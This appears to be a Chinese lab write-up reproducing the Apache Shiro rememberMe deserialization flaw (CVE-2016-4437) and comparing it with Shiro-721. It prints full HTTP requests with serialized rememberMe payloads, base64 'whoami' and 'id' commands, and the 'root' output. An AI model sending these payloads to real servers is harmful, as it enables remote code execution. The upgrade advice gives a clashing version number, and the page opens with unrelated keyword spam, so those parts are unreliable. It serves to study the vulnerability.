网站修改域名服务器,响应式网站 尺寸,工商企业登记查询,wordpress 插件 手机版Apache Shiro 1.2.4反序列化漏洞攻击 CVE-2016-4437 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议总结 漏洞名称
漏洞描述
在 1.2.5 之前的 Apache Shiro 中#xff0c;当未为“记住我”功能配置密钥时#xff0c;远程攻击者可以通过未指定… Apache Shiro 1.2.4反序列化漏洞攻击 CVE-2016-4437 已亲自复现 漏洞名称漏洞描述影响版本 漏洞复现环境搭建漏洞利用 修复建议总结 漏洞名称
漏洞描述
在 1.2.5 之前的 Apache Shiro 中当未为“记住我”功能配置密钥时远程攻击者可以通过未指定的请求参数执行任意代码或绕过预期的访问限制。
影响版本
Apache Shiro 1.2.4
漏洞复现
环境搭建
受害者IP127.0.0.1 攻击者IP8.140.54.167:40201
vulfocus下载链接
https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git启动vulfocus
docker-compose up -d 环境启动后访问http://8.140.54.167:40201/即可看到一个登录页面说明已成功启动。 漏洞利用
工具下载链接
https://github.com/SummerSec/ShiroAttack2/releases/tag/4.7.0使用工具输入目标对密钥进行爆破 并检测利用链。
执行系统命令whoami 找了好几个工具没找到生成payload的rememberMe的工具启动wireshark。 使用burp试一下payload粘进去执行whoami利用回显进行判断
GET / HTTP/1.1
Host: 8.140.54.167:34023
Cookie: JSESSIONID5537D28072A8ECF54A54B3A245596A12; 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
Authorization: Basic d2hvYW1p
Connection: close相应内容如下经过base64解码所以只要替换经过加密的Authorization字段可以利用回显直接使用。
$$$cm9vdAo$$$经过base64解码
root下面是分别对两种情况的测试 第一种key值如果用错了返回啥 第二种key用对了但是高版本执行不成功会返回啥
第一种使用正确的key值进行尝试 使用错误的key值进行尝试 发现使用正确的key值时会返回正确的Set-Cookie: JSESSIONID和Set-Cookie: rememberMedeleteMe; 状态码为200。
使用错误的key值会返回Set-Cookie: rememberMedeleteMe; 不会返回Set-Cookie: JSESSIONID状态码为200。
第二种key用对了但是高版本执行不成功会返回啥
这里使用vulfcous启动shiro-721漏洞进行测试同样存在remember反序列化但影响版本为1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1。高版本进行测试。使用burp抓个包。解一下原始的remember。 爆破一下shiro721的密钥以及利用链和回显方式 执行的payload与上面漏洞不同的是这里使用的是post方法
POST / HTTP/1.1
Cookie: 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
Authorization: Basic aWQ
Cookie: JSESSIONID2a7f4e5f-1ff3-4a07-bbdd-605ea0715807
Host: 8.140.54.167:57748
Content-Length: 2到这里思路错误key用对了但是高版本执行不成功会返回啥要解决这个问题要找个没有漏洞的环境继续gogogo。这里找个一个shiro-cve_2020_13933环境进行验证 经过使用正常的key值但是高版本不存在漏洞的版本只会返回Set-Cookie: rememberMedeleteMe; 不会返回Set-Cookie: JSESSIONID。
修复建议
1、Aрасе Shirо 多个安全漏洞的补丁— 升级最新版本1.1.0 https://github.com/apache/shiro/releases/tag/shiro-root-1.12.0
总结
